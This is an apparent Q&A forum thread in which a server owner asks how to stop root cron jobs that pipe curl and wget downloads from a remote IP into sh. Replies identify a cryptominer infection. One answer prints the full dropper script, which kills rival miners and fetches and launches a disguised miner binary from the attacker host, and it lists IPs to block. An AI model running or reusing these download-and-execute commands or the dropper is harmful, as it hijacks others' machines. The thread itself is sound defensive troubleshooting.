0

Last three months every weekend appear the instruction next in root cron

0 * * * * curl http://91.230.47.41/img/logo.jpg|sh
0 * * * * wget -O - -q http://91.230.47.41/img/logo.jpg|sh

howto block this intrussion.

Very thanks

Serge Ballesta
  • 25,952
  • 4
  • 42
  • 84
jakartaom
  • 1
  • 2
  • Not enough information to say. Someone other than you has access to your system as root, so you need to treat it as compromised - that normally means wipe and reinstall from known good install media. – Matthew Apr 27 '17 at 13:57
  • Server was definitely compromised. Looks like bitcoin miner. – bigC5012 Apr 27 '17 at 14:35
  • just like Matthew says, your server must have been compromised. BTW what are you running in this server? If there are important data then take a backup and transfer it to new server. Install malware scanners and scan those data. Remove anything suspicious. In this current server append "#" infront of cronjob, this will stop your cronjob to run. @Collin: Do you want to explain briefly about bitcoin miner or any link that can help us know more about it? – Prakash Apr 27 '17 at 16:09
  • @Err0rr Bitcoin minor is where the attacker installs bitcoin mining services that use your server's resources to mine bitcoin for them. I investigated that url a bit further and was able to find the configuration file. hxxp://91.230.47.41/img/logind.conf Using curl (hurl.it) that shows the current crypto pools. This may be related to the apache struts vulnerability. See [here](http://www.securitynewspaper.com/2017/03/29/ddos-server-ransomware-apache-struts-2-cve-2017-5638-campaign/) for a little more about this. – bigC5012 Apr 27 '17 at 17:04

1 Answers1

1

if you wget that image and open it w/ nano it contains the following:

#!/bin/sh
rm -rf /tmp/wqbtraqbpv.conf
pkill -f stratum
pkill -f "/tmp/apache"
pkill -f "/tmp/httpd.conf"
pkill -f cryptonight
pkill -f wqbtraqbpv
ps auxf|grep -v grep|grep -v qslulqdbi|grep "/tmp/"|awk '{print $2}'|xargs kill                  -9
ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "65.254.63.20"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "wqbtraqbpv"|awk '{print $2}'|xargs kill -9
ps -fe|grep qslulqdbi|grep -v grep
if [ $? -ne 0 ]
then
echo "start process....."
chmod 777 /tmp/qslulqdbi.conf
rm -rf /tmp/qslulqdbi.conf
curl -o /tmp/qslulqdbi.conf http://91.230.47.41/img/kworker.conf
wget -O /tmp/qslulqdbi.conf http://91.230.47.41/img/kworker.conf
chmod 777 /tmp/kauditd
rm -rf /tmp/kauditd
cat /proc/cpuinfo|grep aes>/dev/null
if [ $? -ne 1 ]
then
curl -o /tmp/kauditd http://91.230.47.41/img/kworker
wget -O /tmp/kauditd http://91.230.47.41/img/kworker
else
curl -o /tmp/kauditd http://91.230.47.41/img/kworker_na
wget -O /tmp/kauditd http://91.230.47.41/img/kworker_na
fi
chmod +x /tmp/kauditd
cd /tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
nohup ./kauditd -c qslulqdbi.conf -t `echo $cores` >/dev/null &
else
echo "runing....."
fi

I would recommend blocking inbound & outbound traffic of:

91.230.47.41
94.23.8.105
37.59.49.7
37.59.51.212
188.165.214.76
176.31.117.82
188.165.254.85

via firewall rules as well as removing the cron job

kworker & kworker_na seem to be clean according to virus total ... but I would check your /tmp/kauditd folder and delete them both

CaffeineAddiction
  • 7,567
  • 2
  • 21
  • 41